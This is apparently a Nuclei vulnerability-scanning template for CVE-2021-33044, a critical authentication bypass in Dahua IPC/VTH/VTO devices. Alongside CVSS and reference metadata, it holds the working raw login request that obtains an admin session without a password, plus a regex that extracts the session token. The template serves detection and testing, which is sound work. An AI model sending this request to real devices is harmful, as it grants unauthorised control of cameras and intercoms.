id: CVE-2021-33044 info: name: Dahua IPC/VTH/VTO - Authentication Bypass author: gy741 severity: critical description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets. reference: - https://github.com/dorkerdevil/CVE-2021-33044 - https://nvd.nist.gov/vuln/detail/CVE-2021-33044 - https://seclists.org/fulldisclosure/2021/Oct/13 - https://www.dahuasecurity.com/support/cybersecurity/details/957 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33044 cwe-id: CWE-287 epss-score: 0.0336 tags: dahua,cve,cve2021,auth-bypass,seclists metadata: max-request: 1 http: - raw: - | POST /RPC2_Login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 Connection: close X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{BaseURL}} Referer: {{BaseURL}} {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0} matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - '"result":true' - 'id' - 'params' - 'session' condition: and extractors: - type: regex group: 1 part: body regex: - ',"result":true,"session":"([a-z]+)"\}' # Enhanced by cs on 2022/06/01